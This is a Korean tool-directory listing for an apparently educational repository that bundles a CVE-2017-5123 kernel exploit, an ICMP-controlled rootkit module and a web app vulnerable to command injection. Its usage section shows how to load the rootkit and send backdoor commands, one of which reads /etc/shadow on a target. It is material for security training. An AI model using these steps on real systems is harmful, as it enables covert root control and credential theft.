Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2017-5123 — CVE-2017-5123 커널 익스플로잇, ICMP 기반 루트킷 명령 및 제어, OS 명령 주입 취약 웹 애플리케이션의 교육 시연 - 사이버 보안 훈련용. | Kitploit
도구/GitHubGitHub/nabilboudra/cve-2017-5123
Privilege EscalationExploitationWeb Application ExploitationCommand and ControlLearning & EducationPayload DevelopmentBinary ExploitationLabs & Practice
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

CVE-2017-5123 커널 익스플로잇, ICMP 기반 루트킷 명령 및 제어, OS 명령 주입 취약 웹 애플리케이션의 교육 시연 - 사이버 보안 훈련용.

저장소 보기
159개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-5123

이 저장소는 CVE-2017-5123의 데모, ICMP 명령 및 제어 백도어, 그리고 CWE-78 (OS 명령 삽입) 취약 웹 애플리케이션을 포함합니다.

CSC 4308 - 챌린지 3의 일부입니다.

사전 요구 사항

  • Linux 커널: 4.13부터 4.13.7 미만
  • Node.js: 10.x
  • npm: 6.x

개요

이 프로젝트는 세 가지 별개의 보안 연구 구성 요소를 보여줍니다:

1. CVE-2017-5123 커널 익스플로잇 (lkm/rootkit.c)

Linux 커널 4.13에서 도입된 waitid 시스템 호출 취약점에 대한 개념 증명 익스플로잇입니다. 이 취약점은 권한 상승 및 샌드박스 탈출을 허용합니다.

  • CVE ID: CVE-2017-5123
  • CWE ID: CWE-787 (범위를 벗어난 쓰기)
  • 영향: 로컬 권한 상승
  • 익스플로잇 작성자: Chris Salls (@chris_salls)

2. 커널 루트킷 LKM (lkm/lkm.c)

ICMP 에코(ping) 패킷을 통해 은밀한 명령 및 제어 채널을 구현하는 악성 Linux 커널 모듈(LKM)입니다.

  • CWE ID: CWE-912 (숨겨진 기능)
  • 기능:
    • 시퀀스 번호 25678의 ICMP 에코 요청을 가로챔
    • ICMP 페이로드에서 셸 명령 추출
    • 루트 권한으로 명령 실행
    • ICMP 에코 응답 패킷을 통해 명령 출력 반환

3. 취약한 웹 애플리케이션 (vulnerable-app/)

OS 명령 삽입에 취약한 React + Node.js 파일 공유 애플리케이션입니다.

  • CWE ID: CWE-78 (OS 명령 삽입)
  • 약점: 파일 내용 필드의 셸 메타문자 삽입

4. ICMP 데이터 핑거 (pinger/data-ping.c)

커널 루트킷 백도어와 통신하기 위해 사용자 정의 페이로드로 조작된 ICMP 에코 요청을 보내는 유틸리티입니다.

사용 방법

LKM 로드

커널 모듈 빌드

cd lkm
make

커널 모듈 로드

sudo insmod lkm.ko

핑거 클라이언트 빌드

cd ../pinger
gcc -o data-ping data-ping.c

ICMP를 통해 명령 전송

# Must run as root to use raw sockets
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

모듈 언로드

sudo rmmod lkm

빠른 재로드

make reload

취약한 웹 애플리케이션 실행

# Build the frontend
cd vulnerable-app/frontend
npm run build

# Copy build to backend
cp -r build ../backend/

# Start the backend server (serves both API and frontend)
cd ../backend
npm start

애플리케이션은 http://localhost:3001에서 사용할 수 있습니다.

참고 자료

  • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
  • CWE-787: https://cwe.mitre.org/data/definitions/787.html
  • CWE-912: https://cwe.mitre.org/data/definitions/912.html
  • Chris Salls' Original Exploit Code: https://github.com/salls/kernel-exploits
도구 다운로드